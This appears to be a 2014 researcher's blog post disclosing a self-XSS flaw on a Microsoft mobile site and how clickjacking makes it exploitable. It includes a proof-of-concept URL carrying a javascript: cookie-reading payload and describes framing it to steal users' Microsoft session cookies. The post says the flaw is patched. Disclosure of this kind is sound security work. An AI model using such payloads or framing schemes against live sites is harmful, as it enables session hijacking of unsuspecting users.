Microsoft: Exploiting XSS with clickjacking

2014-09-01T17:52:00
ID WEBSECURITYLOG:9F84DEAB4F8DD79AECD66698E9333990
Type websecuritylog
Reporter jeet jaiswal (noreply@blogger.com)
Modified 2014-09-01T17:55:20

Description

Little Insight:

Click jacking just hide-the-button-and-follow-the-mouse. also know as UI Redressing (its just playing with the UI of the victim application by clicking and mouse event . In this post we'll show UI-Redressing attack and how an attacker may trigger an unexploitable XSS flaw in an application

How This Work?

UI-Redressing follow some techniques for making successful attack

  1. using mouse clicks
  2. making an invisible iframe & follow the mouse
  3. showing only a certain small part of a web page in a frame
  4. dragging a text out of an application
  5. dragging a text into an application

My Finding....

Domain: http://m.microsoft.com

vulnerable parameter : phrase = xss

Poc url :

[http://m.microsoft.com/showcase/en/US/search?pageindex=sv1:2&phrase=[url%3djavascript:alert%28document.cookie%29]click%20here%20and%20see%20your%20result/url]

After using url .In result its xss payload store as hyperlink tag as click here to see result

When user click on hyperlink tag that xss run

That's an Self Xss which want user interaction but in that m found domain not set any security for X-Frame-Options Header its make an idea for Exploiting XSS with clickjacking

I am set an iframe with poc url on my website with some button when user come to my site and click on any button I can steal users cookie of Microsoft account with sessions

See behind the click button

When User click button Exploiting XSS with click-jacking

More Information

The vulnerability mentioned here has been confirmed patched by the Microsoft Security Team.